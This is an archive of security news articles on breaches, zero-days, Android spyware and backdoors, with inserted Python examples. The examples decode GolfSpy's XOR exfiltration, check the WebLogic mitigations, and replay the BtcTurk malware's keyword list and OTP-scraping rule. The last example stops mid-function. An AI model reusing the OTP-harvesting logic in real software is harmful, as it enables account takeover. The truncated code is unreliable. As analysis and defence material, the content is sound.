Category Archives: Hacking

Oregon Department of Human Services data breach impacted 645,000 clients

The Oregon Department of Human Services announced it was the victim of a data breach in January; roughly 645,000 clients were potentially impacted.

Oregon Department of Human Services officials confirmed that the organization has suffered a data breach that has exposed personal details and health information of 645,000 clients.

The incident happened in January, and the Oregon Department of Human Services is now notifying the affected clients.

“The Oregon Department of Human Services is notifying about 645,000 clients whose personal information is now at risk from a January data breach. State officials announced the notifications on Tuesday. They’ll start mailing them on Wednesday.” states the Statesman-Journal.

“Affected people were enrolled in the department’s welfare and children services programs at the time of the breach. Officials said the compromised data includes personal health information, but it’s unknown if it was viewed or inappropriately used.”

Individuals impacted by the data breach were enrolled in the department’s welfare and children services programs at the time of the security incident.

“The state is also providing 12 months of identity theft monitoring and recovery services, which includes a $1 million insurance reimbursement policy to impacted individuals.” reads the Associated Press.

The department was hit by a phishing campaign on January 8, 2019, and at least nine employees were deceived in the attack.

“The breach happened during an email “phishing” attempt that targeted the department Jan. 8. Nine employees opened the email and clicked on a link that gave the perpetrator access to their email accounts.” concludes the AP.

Pierluigi Paganini

(SecurityAffairs – Oregon Department of Human Services, hacking)

The post Oregon Department of Human Services data breach impacted 645,000 clients appeared first on Security Affairs.

Hacking Hardware Security Modules

Security researchers Gabriel Campana and Jean-Baptiste Bédrune are giving a hardware security module (HSM) talk at BlackHat in August:

This highly technical presentation targets an HSM manufactured by a vendor whose solutions are usually found in major banks and large cloud service providers. It will demonstrate several attack paths, some of them allowing unauthenticated attackers to take full control of the HSM. The presented attacks allow retrieving all HSM secrets remotely, including cryptographic keys and administrator credentials. Finally, we exploit a cryptographic bug in the firmware signature verification to upload a modified firmware to the HSM. This firmware includes a persistent backdoor that survives a firmware update.

They have an academic paper in French, and a presentation of the work. Here's a summary in English.

There were plenty of technical challenges to solve along the way, in what was clearly a thorough and professional piece of vulnerability research:

  1. They started by using legitimate SDK access to their test HSM to upload a firmware module that would give them a shell inside the HSM. Note that this SDK access was used to discover the attacks, but is not necessary to exploit them.

  2. They then used the shell to run a fuzzer on the internal implementation of PKCS#11 commands to find reliable, exploitable buffer overflows.

  3. They checked they could exploit these buffer overflows from outside the HSM, i.e. by just calling the PKCS#11 driver from the host machine.

  4. They then wrote a payload that would override access control and, via another issue in the HSM, allow them to upload arbitrary (unsigned) firmware. It's important to note that this backdoor is persistent: a subsequent update will not fix it.

  5. They then wrote a module that would dump all the HSM secrets, and uploaded it to the HSM.

Tor Browser 8.5.2 fixes Firefox zero-day. Update it now!

Developers at the Tor Project have released the Tor Browser 8.5.2 to address the recently fixed CVE-2019-11707 zero-day flaw in Mozilla Firefox.

Yesterday I reported the news of a critical zero-day in Firefox that was addressed by Mozilla with a new release. The vulnerability, tracked as CVE-2019-11707, is a type confusion flaw in Array.pop. Mozilla has addressed it with the release of Firefox 67.0.3 and Firefox ESR 60.7.1.

The flaw was reported by Coinbase Security and Samuel Groß of Google Project Zero team. Samuel Groß explained that he reported the bug to Mozilla on April 15, 2019.

The researcher explained that the vulnerability could be used for remote code execution if chained with a separate sandbox escape issue.

Developers at the Tor Project have released the Tor Browser 8.5.2 to address the CVE-2019-11707 vulnerability too. It is very important for Tor users to use the updated version of the Tor Browser to protect their anonymity.

This vulnerability did not affect users running under the Safer or Safest security levels.

“This release fixes a critical security update in Firefox. In addition, we update NoScript to 10.6.3, fixing a few issues.” reads the announcement of the Tor Project. “Users of the safer and safest security levels were not affected by this security issue.”

Users can manually check the availability of new updates by going to the Tor Browser menu -> Help -> About Tor Browser.

Mozilla confirmed that threat actors exploited the zero-day in targeted attacks in the wild; the organization did not provide technical details of the issue.

The DHS’s Cybersecurity and Infrastructure Security Agency (CISA) also issued a short alert for the vulnerability in Mozilla.

The Tor Browser 8.5.2 also includes an updated version of the NoScript add-on (version 10.6.3).

Bad news for Android users: the update for the Android version of the browser will not be available until the weekend; in the meantime, Android users should use the browser at the Safer or Safest security level.

“As part of our team is currently traveling to an event, we are unable to access our Android signing token, therefore the Android release is not yet available. We expect to be able to publish the Android release this weekend.” continues the announcement.

The Tor Browser 8.5.2 can be downloaded from the Tor Browser download page and from the distribution directory.

Below the full changelog for the new version:

Tor Browser 8.5.2 -- June 19 2019
 * All platforms
   * Pick up fix for Mozilla's bug 1544386
   * Update NoScript to 10.6.3
     * Bug 29904: NoScript blocks MP4 on higher security levels
     * Bug 30624+29043+29647: Prevent XSS protection from freezing the browser

Pierluigi Paganini

(SecurityAffairs – Tor, zero-day)


Bouncing Golf cyberespionage campaign targets Android users in Middle East

According to security researchers at Trend Micro, a cyberespionage campaign is targeting Android users in Middle Eastern countries.

Security researchers at Trend Micro have spotted a cyberespionage campaign, dubbed ‘Bouncing Golf’, that is targeting Android users in Middle Eastern countries.

Threat actors are using a piece of malware detected as GolfSpy, which implements multiple features and can hijack the victim’s device.

GolfSpy could steal the following information:

  • Device accounts
  • List of applications installed in the device
  • Device’s current running processes
  • Battery status
  • Bookmarks/Histories of the device’s default browser
  • Call logs and records
  • Clipboard contents
  • Contacts, including those in VCard format
  • Mobile operator information
  • Files stored on SDcard
  • Device location
  • List of image, audio, and video files stored on the device
  • Storage and memory information
  • Connection information
  • Sensor information
  • SMS messages
  • Pictures

Attackers distributed the malware in tainted legitimate applications that are hosted on websites advertised on social media. The tainted applications pose as communication, news, lifestyle, book, and reference apps that are commonly used in the Middle East.

“We uncovered a cyberespionage campaign targeting Middle Eastern countries. We named this campaign “Bouncing Golf” based on the malware’s code in the package named “golf.”” reads the blog post published by Trend Micro. “The malware involved, which Trend Micro detects as AndroidOS_GolfSpy.HRX, is notable for its wide range of cyberespionage capabilities. Malicious codes are embedded in apps that the operators repackaged from legitimate applications.”

According to the experts that have analyzed the command and control (C&C) servers used in the Bouncing Golf campaign, more than 660 Android devices have been infected with GolfSpy malware. The attackers appear to be focused on stealing military-related information.

The researchers speculate on a possible connection to the Domestic Kitten espionage activities, an extensive surveillance operation conducted by an Iranian APT actor against specific groups of individuals since 2016.

Experts found similarities in the structure of code strings and in the format of the data targeted for theft.

The GolfSpy malware is also able to connect to a remote server to fetch and perform a broad range of commands such as searching for/listing/deleting/renaming files, downloading/uploading files to/from the device, taking screenshots, installing application packages (APK), recording audio and video, and updating the malware.

Once the malware is executed, it generates a unique ID and then collects targeted data and writes it to a file on the mobile device.

The malicious code allows the attackers to choose which data types to collect. Stolen data is encrypted using a simple XOR operation with a pre-configured key, then sent to the C2 via HTTP POST requests.

GolfSpy also connects to the C2 via a socket in order to receive additional commands. In this case, stolen data is also sent to the C2 in encrypted form via the socket; the experts pointed out that the encryption key is different from the one used when data is sent via HTTP.
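The XOR scheme described above is weak in a way an analyst can exploit directly: repeating-key XOR leaks the key wherever a fixed plaintext header precedes the stolen data. The following added example, which is neither Trend Micro's code nor the malware's, shows that workflow on constructed data. The two keys, the record layout ('name=value' fields separated by '|' with a fixed 'version=1|' header) and the key length are all assumptions made for the demonstration, not GolfSpy's real format.

```python
"""Repeating-key XOR helpers for analysing exfiltrated records of the kind the
GolfSpy write-up describes: data XORed with a pre-configured key, one key for
the HTTP POST channel and a different one for the socket channel.

Added example, not Trend Micro's code nor the malware's. The keys, the record
layout ('name=value' fields separated by '|', starting with a fixed
'version=1|' header) and the captured blobs are all constructed here.
"""
from itertools import cycle

# Constructed stand-ins for the malware's two pre-configured keys (assumption).
HTTP_KEY = b"golf2019"
SOCKET_KEY = b"b0unc3"

# Assumed fixed header at the start of every record; it is what makes
# known-plaintext key recovery possible for an analyst.
KNOWN_PREFIX = b"version=1|"


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR data with a repeating key. XOR is its own inverse, so the same
    call encrypts and decrypts."""
    if not key:
        raise ValueError("key must not be empty")
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def recover_key(ciphertext: bytes, known_prefix: bytes, key_len: int) -> bytes:
    """Recover a repeating XOR key of length key_len from a known plaintext
    prefix: c[i] = p[i] ^ key[i % key_len], so key_len known bytes at the
    start of the record give the whole key."""
    if len(known_prefix) < key_len or len(ciphertext) < key_len:
        raise ValueError("need at least key_len bytes of known plaintext and ciphertext")
    return bytes(c ^ p for c, p in zip(ciphertext[:key_len], known_prefix[:key_len]))


def decode_record(blob: bytes, key: bytes) -> dict:
    """Decrypt one record and split it into fields.

    A wrong key usually leaves control or non-ASCII bytes in the output;
    treat that as a decode failure and return an empty dict.
    """
    text = xor_bytes(blob, key).decode("ascii", errors="replace")
    if not text.isprintable():
        return {}
    fields = {}
    for part in text.split("|"):
        name, sep, value = part.partition("=")
        if sep:
            fields[name] = value
    return fields


# Constructed sample record and the two ciphertexts the two channels would carry.
SAMPLE_PLAINTEXT = KNOWN_PREFIX + b"id=a1b2c3d4|type=sms|from=+90555000000|body=code 482913"
HTTP_BLOB = xor_bytes(SAMPLE_PLAINTEXT, HTTP_KEY)
SOCKET_BLOB = xor_bytes(SAMPLE_PLAINTEXT, SOCKET_KEY)


def analyse() -> dict:
    """Analyst workflow: recover the HTTP key from the fixed header, decode
    the HTTP blob, then show that the same key does not decode the socket
    blob, which the write-up says uses a different key."""
    http_key = recover_key(HTTP_BLOB, KNOWN_PREFIX, len(HTTP_KEY))
    return {
        "recovered_http_key": http_key,
        "http_record": decode_record(HTTP_BLOB, http_key),
        "socket_with_http_key": decode_record(SOCKET_BLOB, http_key),
        "socket_record": decode_record(SOCKET_BLOB, SOCKET_KEY),
    }


if __name__ == "__main__":
    for name, value in analyse().items():
        print(f"{name}: {value}")
```

The key length is passed in rather than discovered; in practice it comes from the sample itself (the key is "pre-configured", so it sits in the APK) or from a period search over the ciphertext. The point the example makes for a defender is that a single captured POST body plus a guessable header is enough to read everything sent on that channel, which is why the socket channel's separate key only marginally helps the operators.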

The operators behind the Bouncing Golf campaign attempt to cover their tracks, for example, they masked the registrant contact details of the C&C domains used in the campaign. The IP addresses associated with the C&C servers used in the campaign also appear to be located in many European countries, including Russia, France, Holland, and Germany.

“As we’ve seen in last year’s mobile threat landscape, we expect more cyberespionage campaigns targeting the mobile platform given its ubiquity, employing tried-and-tested techniques to lure unwitting users.” Trend Micro concludes. “The extent of information that these kinds of threats can steal is also significant, as it lets attackers virtually take over a compromised device.”

Pierluigi Paganini

(SecurityAffairs – Bouncing Golf, hacking)


AMCA files for bankruptcy following the recently disclosed security breach

Retrieval-Masters Creditors Bureau, the company that operates healthcare billing services provider AMCA, has filed for Chapter 11 bankruptcy due to a recent data breach.

Retrieval-Masters Creditors Bureau, the company that operates the recovery agency for patient collections American Medical Collection Agency (AMCA), has filed for Chapter 11 bankruptcy due to a recent security breach that affected millions of individuals.

Retrieval-Masters Creditors Bureau would have to pay millions of dollars for the incident response; for this reason, it has decided to terminate AMCA.

The news is disconcerting and demonstrates the potential effects of a data breach on an organization.

The incident impacted millions of users; a filing by Quest Diagnostics with the U.S. Securities and Exchange Commission (SEC) revealed that the attackers had access to the web payment portal of the American Medical Collection Agency between August 1, 2018 and March 30, 2019.

AMCA provides services to numerous firms, including the revenue cycle management provider Optum360, medical testing firm Quest Diagnostics, and LabCorp.

The security breach has impacted roughly 12 million Quest Diagnostics patients and roughly 7.7 million LabCorp patients. After the disclosure of the incident, LabCorp announced the termination of its business relationship with AMCA, and Quest Diagnostics suspended sending collection requests to AMCA.

The hackers broke into company databases containing millions of medical test lab patients’ personal and payment information.

Another 422,000 patients of BioReference Laboratories, roughly 500,000 patients of CareCentrix, and customers of Sunrise Laboratories were also impacted by the security breach.

AMCA is in the eye of the storm: several class action lawsuits have been filed against it, and the number of potentially affected people continues to grow.

According to documents submitted to the U.S. Bankruptcy Court in the Southern District of New York, many payment cards used on the AMCA web site had been used for fraudulent charges.

The investigation into the incident has cost AMCA roughly $400,000 and it has been estimated that the company will spend another $3.8 million to send millions of notices to impacted individuals.

Pierluigi Paganini

(SecurityAffairs – AMCA, hacking)


Another Remote Code Execution flaw in WebLogic exploited in the wild

Oracle released emergency patches for another critical remote code execution vulnerability affecting WebLogic Server.

On Tuesday, Oracle released emergency patches for another critical remote code execution vulnerability affecting the WebLogic Server.

The vulnerability, tracked as CVE-2019-2729, affects WebLogic versions 10.3.6.0.0, 12.1.3.0.0 and 12.2.1.3.0. It is a remotely exploitable deserialization vulnerability via XMLDecoder in Oracle WebLogic Server Web Services, and it received a CVSS score of 9.8.

A remote attacker could exploit the CVE-2019-2729 flaw without authentication. The issue was independently reported to Oracle by many security researchers.

“This Security Alert addresses CVE-2019-2729, a deserialization vulnerability via XMLDecoder in Oracle WebLogic Server Web Services. This remote code execution vulnerability is remotely exploitable without authentication, i.e., may be exploited over a network without the need for a username and password.” reads the security advisory published by Oracle.

“Due to the severity of this vulnerability, Oracle strongly recommends that customers apply the updates provided by this Security Alert as soon as possible.”

Oracle urges its users to apply the necessary patches and also the latest Critical Patch Update (CPU).

John Heimann, VP of Security Program Management at Oracle, pointed out that the CVE-2019-2729 is different from the recently discovered CVE-2019-2725 that was exploited in cryptojacking campaigns and in hacking campaigns spreading the Sodinokibi ransomware.

“Please note that while the issue addressed by this alert is a deserialization vulnerability, like that addressed in Security Alert CVE-2019-2725, it is a distinct vulnerability.” wrote Heimann.

“Due to the severity of this vulnerability, Oracle recommends that this Security Alert be applied as soon as possible.”

According to the experts at Knownsec 404 Team, who also reported the flaw, CVE-2019-2729 is actually the result of an incomplete patch for CVE-2019-2725. Knownsec 404 Team confirmed that threat actors are already exploiting CVE-2019-2729 in the wild.

“Then today, a new oracle webLogic deserialization RCE 0day vulnerability was found and is being actively used in the wild. We analyzed and reproduced the 0day vulnerability, which is based on and bypasses the patch for CVE-2019–2725.” reads a post published by Knownsec 404 Team.

Knownsec 404 Team provided the following temporary solutions:

  • Scenario-1: Find and delete wls9_async_response.war, wls-wsat.war and restart the Weblogic service.
  • Scenario-2: Controls URL access for the /_async/* and /wls-wsat/* paths by access policy control.
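Both workarounds are easy to apply and just as easy to undo by accident (a redeploy restores the WARs, a proxy change drops the path rule), so they are worth verifying. The following added example, which is not Oracle's or Knownsec 404 Team's code, checks both: it walks a directory tree for the two WAR artefacts named in Scenario-1, and it parses access-log lines to find requests to the /_async/* and /wls-wsat/* paths of Scenario-2 that were not denied. The common-log-format layout, the sample log lines and the throwaway directory tree are constructed for the demonstration.

```python
"""Checks for the two temporary mitigations for CVE-2019-2729 quoted above.

Added example, not Oracle's or Knownsec 404 Team's code. It looks for the
wls9_async_response.war / wls-wsat.war artefacts under a directory
(Scenario-1) and flags access-log requests to the /_async/* and /wls-wsat/*
paths that were not denied (Scenario-2). The access-log format is assumed to
be the common log format, and the log lines and directory tree below are
constructed for the demonstration.
"""
import os
import re
import shutil
import tempfile

# Artefacts the advisory says to delete (Scenario-1).
VULNERABLE_WARS = {"wls9_async_response.war", "wls-wsat.war"}

# URL prefixes the advisory says to put behind an access policy (Scenario-2).
RESTRICTED_PREFIXES = ("/_async/", "/wls-wsat/")

# Common log format: host ident user [time] "METHOD path PROTO" status size
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+'
)


def find_vulnerable_wars(root: str) -> list:
    """Return paths (files or exploded directories) named like the affected
    WARs anywhere under root, sorted."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            if name in VULNERABLE_WARS:
                hits.append(os.path.join(dirpath, name))
    return sorted(hits)


def flag_restricted_requests(log_lines) -> list:
    """Return (client, method, path, status) for every parsed request whose
    path starts with one of the restricted prefixes."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path = m.group("path")
        if path.startswith(RESTRICTED_PREFIXES):
            hits.append((m.group("host"), m.group("method"), path, int(m.group("status"))))
    return hits


def unblocked_requests(log_lines) -> list:
    """Requests to restricted paths answered with something other than 403 or
    404: evidence that the access policy is missing or incomplete for that
    path."""
    return [h for h in flag_restricted_requests(log_lines) if h[3] not in (403, 404)]


def demo_find_wars() -> list:
    """Build a throwaway tree containing both artefacts, scan it, and return
    the hits relative to the tree root."""
    root = tempfile.mkdtemp(prefix="weblogic-demo-")
    try:
        os.makedirs(os.path.join(root, "server", "lib"))
        open(os.path.join(root, "server", "lib", "wls-wsat.war"), "wb").close()
        os.makedirs(os.path.join(root, "deployed", "wls9_async_response.war"))
        return [os.path.relpath(p, root) for p in find_vulnerable_wars(root)]
    finally:
        shutil.rmtree(root, ignore_errors=True)


# Constructed sample access-log lines (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [19/Jun/2019:10:01:02 +0000] "GET /console/ HTTP/1.1" 200 5120',
    '203.0.113.7 - - [19/Jun/2019:10:02:15 +0000] "POST /_async/ HTTP/1.1" 200 1042',
    '203.0.113.7 - - [19/Jun/2019:10:02:16 +0000] "POST /wls-wsat/ HTTP/1.1" 403 0',
    '198.51.100.9 - - [19/Jun/2019:10:03:00 +0000] "GET /wls-wsat/ HTTP/1.1" 404 0',
    'garbage line that does not parse',
]

if __name__ == "__main__":
    print("artefacts found in demo tree:", demo_find_wars())
    for hit in unblocked_requests(SAMPLE_LOG):
        print("NOT BLOCKED:", hit)
```

Run `find_vulnerable_wars` against the real domain and server directories rather than the demo tree, and feed `unblocked_requests` the front-end proxy or WebLogic access log. A 200 on one of these paths after the policy is supposedly in place is the signal to act on; the 403/404 hits are still useful as a record of who is probing.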

Pierluigi Paganini

(SecurityAffairs – CVE-2019-2729, hacking)


Mozilla fixed a Firefox Zero-Day flaw exploited in targeted attacks

Mozilla released security updates for Firefox that addressed a critical zero-day vulnerability exploited in targeted attacks in the wild.

Mozilla released security updates for its Firefox web browser that address a critical vulnerability that has been actively exploited in the wild.

The zero-day vulnerability, tracked as CVE-2019-11707, is a type confusion flaw in Array.pop. Mozilla has addressed it with the release of Firefox 67.0.3 and Firefox ESR 60.7.1.

“A type confusion vulnerability can occur when manipulating JavaScript objects due to issues in Array.pop. This can allow for an exploitable crash. We are aware of targeted attacks in the wild abusing this flaw.” reads the security advisory published by Mozilla.

The flaw was reported by Coinbase Security and Samuel Groß of Google Project Zero team. Samuel Groß explained that he reported the bug to Mozilla on April 15, 2019.

The researcher explained that the vulnerability could be used for remote code execution if chained with a separate sandbox escape issue.

Mozilla confirmed that threat actors exploited the zero-day in targeted attacks in the wild; the organization did not provide technical details of the issue.

The DHS’s Cybersecurity and Infrastructure Security Agency (CISA) also issued a short alert for the vulnerability in Mozilla.

“Mozilla has released security updates to address a vulnerability in Firefox and Firefox ESR. An attacker could exploit this vulnerability to take control of an affected system.” states the alert. “This vulnerability was detected in exploits in the wild.”

In 2016, security researchers found a malicious script that exploited another Firefox Zero-day to identify some users of the Tor anonymity network.

Pierluigi Paganini

(SecurityAffairs – Mozilla Firefox zero-day, hacking)


Eatstreet, the online food ordering service disclosed a security breach

Eatstreet, the online food ordering service, disclosed a security breach that exposed customer payment card data and details of partners.

EatStreet, an online and mobile food ordering service, disclosed a security breach that exposed customer payment card data and details of delivery and restaurant partners.

Attackers breached the company network on May 3 and stole data from its database. On May 17, the company discovered the intrusion and locked out the attacker.

Stolen data includes names, addresses, phone numbers, email addresses and billing addresses, as well as financial data (i.e. bank accounts, routing numbers, credit card numbers, expiration dates and card verification codes).

“On May 3, 2019, an unauthorized third party gained access to our database, which we discovered on May 17, 2019. The unauthorized third party was able to acquire information that was in our database on May 3, 2019. We were able, however, to promptly terminate the unauthorized access to our systems when we discovered the incident.” reads the data breach notification letter sent to delivery and restaurant partners.

EatStreet currently offers its services to “over 15,000 restaurants in more than 1,100 cities,” and the company’s Android app has over 100,000 installs as of June 5.

EatStreet promptly alerted the credit card payment processors and “hired a leading external IT forensics firm to respond to and investigate the incident. We audited our systems to validate that there was no other unauthorized access.”

At the time of writing, law enforcement agencies are not investigating the incident:

“EatStreet continues to work with outside experts to identify other measures it can take to improve its security controls. While our investigation is ongoing, there was no law enforcement investigation that delayed notification to you.”

“In addition, we have enhanced the security of our systems, including reinforcing multi-factor authentication, rotating credential keys and reviewing and updating coding practices,”

According to ZDNet, the hacker who breached the company is Gnosticplayers, who made the headlines between February and April by disclosing, in five rounds, a series of massive, previously unreported data breaches. The list of victims includes Canva, 500px, UnderArmor, ShareThis, GfyCat, Ge.tt, Evite, and others.

The hacker took credit for the data breach in a conversation with ZDNet about the Canva hack allegations last month.

At the time of writing, the extent of the security breach is not clear, but the hacker claimed he stole over six million user records.

“In an email to ZDNet today, the hacker claimed he was in the possession of over six million user records he took from the company’s servers. Over the past few months, this hacker has stolen and put up for sale 1,071 billion user credentials from 45 companies. “

Pierluigi Paganini

(SecurityAffairs – EatStreet, hacking)



Modular Plurox backdoor can spread over local network

Kaspersky experts recently discovered a backdoor dubbed Plurox that can spread itself over a local network and allows attackers to install additional malware.

Kaspersky experts discovered the Plurox backdoor in February; it can spread itself over a local network and can be used by attackers to install additional malware.

The Plurox backdoor is written in C and compiled with Mingw GCC; it communicates with the command and control (C&C) server over TCP. The malware has a modular structure and uses a variety of plugins to implement its functionality.

“The analysis showed the malware to have a few quite unpleasant features. It can spread itself over a local network via an exploit, provide access to the attacked network, and install miners and other malicious software on victim computers.” reads the analysis published by Kaspersky. “What’s more, the backdoor is modular, which means that its functionality can be expanded with the aid of plugins, as required. Post-analysis, the malware was named Backdoor.Win32.Plurox.”

The analysis of the code revealed the presence of debug lines, a circumstance that suggests the malware was at the testing stage when it was first spotted.

The Plurox backdoor uses two different ports to load plugins, the ports along with the C&C addresses are hardcoded into the source code of the malware. 

Monitoring the backdoor’s activity, experts discovered two “subnets.” One subnet is used to provide only miners (auto_proc, auto_cuda, auto_gpu_nvidia modules) to the Plurox backdoor. The other one, besides miners (auto_opencl_amd, auto_miner), is used to pass several plugins to the malware.

The Plurox backdoor supports the following commands:

  • Download and run files using WinAPI CreateProcess
  • Update bot
  • Delete and stop (delete own service, remove from autoload, delete files, remove artifacts from registry)
  • Download and run plugin
  • Stop plugin
  • Update plugin (stop process and delete file of old version, load and start new one)
  • Stop and delete plugin

The backdoor delivers the appropriate cryptocurrency miner for the victim’s system configuration.

The researchers observed eight mining modules that were used to infect systems running on different processors: auto_proc, auto_cuda, auto_miner, auto_opencl_amd, auto_gpu_intel, auto_gpu_nvidia, auto_gpu_cuda, and auto_gpu_amd. 

Experts also discovered that the Plurox backdoor supports a UPnP plugin designed to target the local network.

“The module receives from the C&C a subnet with mask /24, retrieves all IP addresses from it, and attempts to forward ports 135 (MS-RPC) and 445 (SMB) for the currently selected IP address on the router using the UPnP protocol. If successful, it reports the result to the C&C center, waits for 300 seconds (5 minutes), and then deletes the forwarded ports. We assume that this plugin can be used to attack a local network. ” states the report.

If administrators detect the attack on a host, they will see it coming from the router rather than from a local machine.

The UPnP plugin is similar to the EternalSilence exploit, with the difference that Plurox forwards TCP port 135 instead of 139. 

The backdoor uses the SMB plugin for spreading over the network using the EternalBlue exploit.

The module borrows code from the Trickster Trojan; the researchers believe that the authors of Plurox and Trickster may be linked.

Further technical details, including IoCs are reported in the analysis published by Kaspersky.

Pierluigi Paganini

(SecurityAffairs – XSS, hacking)


Yana Peel, chief executive of London’s Galleries, resigned after discovery of her links with NSO group

The head of London’s Serpentine Galleries resigned on Tuesday following a Guardian report about her links to the Israeli surveillance firm NSO Group.

On Tuesday, the chief executive of London’s Serpentine Galleries, Yana Peel, resigned following the revelation of the Guardian newspaper about her links to the Israeli surveillance firm NSO Group.

According to the newspaper, Yana Peel is the co-owner of the controversial Israeli company. The board of trustees of the galleries has accepted Peel’s resignation.

“The head of the Serpentine Galleries has resigned after the Guardian revealed she is the co-owner of an Israeli cyberweapons company whose software has allegedly been used by authoritarian regimes to spy on dissidents.” reads the post published by the Guardian.

“On Tuesday, Yana Peel announced she was stepping down as the chief executive of the prestigious London art gallery so the work of the Serpentine would not be undermined by what she called “misguided personal attacks on me and my family”.”

Last week, the Guardian revealed that Yana Peel is one of the owners of the private equity firm Novalpina Capital, co-founded by Peel’s husband, Stephen, that has the majority of the shares in NSO Group.

“I have decided I am better able to continue my work in supporting the arts, the advancement of human rights and freedom of expression by moving away from my current role.” Peel said

The principal product of the NSO Group is surveillance software called Pegasus; it allows its operators to spy on the most common mobile devices, including iPhones, Androids, and BlackBerry and Symbian systems.

Pegasus is a powerful surveillance tool: it can steal any kind of data from a smartphone and use the device’s camera and microphone to spy on its surroundings.

The NSO Group operated in the dark for several years, until researchers from Citizen Lab and the firm Lookout spotted its software in targeted attacks against the UAE human rights defender Ahmed Mansoor.

The researchers also spotted attacks against a Mexican journalist who had reported on corruption in the Mexican government.

NSO replied that its surveillance solution was “intended to be used exclusively for the investigation and prevention of crime and terrorism.”

People familiar with the NSO Group confirmed that the company has an internal ethics committee that monitors the sales and potential customers verifying that the software will not be abused to violate human rights.

Officially the sale of surveillance software is limited to authorized governments to support investigations of agencies on criminal organizations and terrorist groups.

Unfortunately, its software is known to have been abused to spy on journalists and human rights activists.

The traces collected by Amnesty International were corroborated by the findings of an investigation conducted by researchers at the internet watchdog Citizen Lab.

Citizen Lab collected evidence of attacks against 175 targets worldwide carried out with the NSO spyware, and uncovered further attacks against individuals in Qatar and Saudi Arabia, where the Israeli surveillance software is becoming very popular.

“The work of the Serpentine – and its incomparable artistic director – cannot be allowed to be undermined by misguided personal attacks on me and my family. These attacks are based upon inaccurate media reports now subject to legal complaints.” Peel said. “I have decided I am better able to continue my work in supporting the arts, the advancement of human rights and freedom of expression by moving away from my current role,” she continued.

Pierluigi Paganini

(SecurityAffairs – NSO group, Surveillance)


Android apps use a novel technique to bypass 2FA and steal Bitcoin

An expert discovered a new technique that bypasses SMS-based two-factor authentication while circumventing Google’s recent SMS permission restrictions.

The popular security expert Lukas Stefanko from ESET discovered some apps (named BTCTurk Pro Beta and BtcTurk Pro Beta) impersonating the Turkish cryptocurrency exchange BtcTurk in an attempt to steal login credentials.

In order to steal the 2FA OTPs, the apps read the one-time passwords that appear in 2FA notifications from the service, instead of intercepting the SMS messages that deliver them.

Stefanko explained that the renewed interest in Bitcoin is associated with the rise in its price.

“When Google restricted the use of SMS and Call Log permissions in Android apps in March 2019, one of the positive effects was that credential-stealing apps lost the option to abuse these permissions for bypassing SMS-based two-factor authentication (2FA) mechanisms.” wrote the expert.

“We have now discovered malicious apps capable of accessing one-time passwords (OTPs) in SMS 2FA messages without using SMS permissions, circumventing Google’s recent restrictions.”

When the apps are executed for the first time they request ‘notification access’ permission that is used to read the notifications displayed by other apps installed on the device, dismiss those notifications, or click buttons they contain.

Once the permission is granted, the apps display a fake login form asking for the user’s BtcTurk login credentials. Once the user provides them, the apps display a fake error message.

“Opss! Due to the change made in the SMS Verification system, we are temporarily unable to service our mobile application. After the maintenance work, you will be notified via the application. Thank you for your understanding.” reads the message (Translated from Turkish).

In the meantime, the login credentials for the services are sent back to the attacker’s server. 

At this point, the rogue apps leverage the notification access permission to read all incoming notifications and select those related to applications of interest: the apps read the notifications of apps whose names contain the keywords gm, yandex, mail, k9, outlook, SMS, and messaging. These notifications are sent to the attacker, who selects the ones containing the one-time passwords used in 2FA.

“The displayed content of all notifications from the targeted apps is sent to the attacker’s server. The content can be accessed by the attackers regardless of the settings the victim uses for displaying notifications on the lock screen. The attackers behind this app can also dismiss incoming notifications and set the device’s ringer mode to silent, which can prevent victims from noticing fraudulent transactions happening.” continues the expert.

At this point, impersonating the victim is easy. Any 2FA OTP can be dismissed on the victim’s phone and forwarded to the attacker, who now holds both the login credentials and the OTP and can use them to access the account.
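Two checks a practitioner would want at this point, as an added example rather than code from ESET or from the malicious apps: first, an audit of which packages on a device already hold notification access (Android keeps the list in the secure setting `enabled_notification_listeners`, dumped with `adb shell settings get secure enabled_notification_listeners`; the value parsed here is constructed); second, a replay of the selection rule the report describes, keyword match on the notifying package name followed by a numeric-code search, run over constructed notifications to show exactly what such a listener would forward. The allowlist, the sample packages and the 4-8 digit OTP shape are assumptions.

```python
"""Audit which Android apps hold 'notification access', and show what an
OTP-scraping listener of the kind ESET describes keys on.
Added example: not ESET's code and not the malicious apps' code.
The secure setting name and the adb command are real Android; the setting
value, allowlist and notifications below are constructed for illustration."""
from __future__ import annotations
import re

# Android stores the NotificationListenerService components allowed to read
# every notification in this secure setting.  Dump it on a device with:
#   adb shell settings get secure enabled_notification_listeners
SETTING = "enabled_notification_listeners"

# Constructed sample of that command's output: colon-separated ComponentName
# strings of the form <package>/<service class>; a class starting with '.'
# is relative to the package.
SAMPLE_SETTING_VALUE = (
    "com.google.android.wearable.app/com.google.android.clockwork.companion.NotificationListener"
    ":com.example.btcturk.pro/.NotifyService"
    ":com.example.koineks/com.example.koineks.Listener"
)

# Packages an organisation knowingly lets read notifications (constructed).
ALLOWLIST = {"com.google.android.wearable.app"}

# Keywords ESET reported the apps matched against the notifying package name.
TARGET_KEYWORDS = ("gm", "yandex", "mail", "k9", "outlook", "sms", "messaging")

# Four to eight digits not glued to other digits: the usual shape of an SMS or
# e-mail OTP (assumption, not something the report states).
OTP_RE = re.compile(r"(?<!\d)\d{4,8}(?!\d)")


def parse_listeners(value: str) -> list[tuple[str, str]]:
    """Split the setting value into (package, fully qualified service) pairs."""
    pairs = []
    for component in filter(None, value.strip().split(":")):
        package, _, cls = component.partition("/")
        if cls.startswith("."):
            cls = package + cls
        pairs.append((package, cls))
    return pairs


def unexpected_listeners(value: str, allowlist=ALLOWLIST) -> list[str]:
    """Packages with notification access that are not on the allowlist."""
    return sorted({pkg for pkg, _ in parse_listeners(value) if pkg not in allowlist})


def is_targeted_package(package: str) -> bool:
    """The reported selection rule: the notifying package name contains a keyword."""
    name = package.lower()
    return any(keyword in name for keyword in TARGET_KEYWORDS)


def scrape_otps(notifications: list[tuple[str, str]]) -> list[str]:
    """What a listener in the reported scheme would forward: OTP-looking
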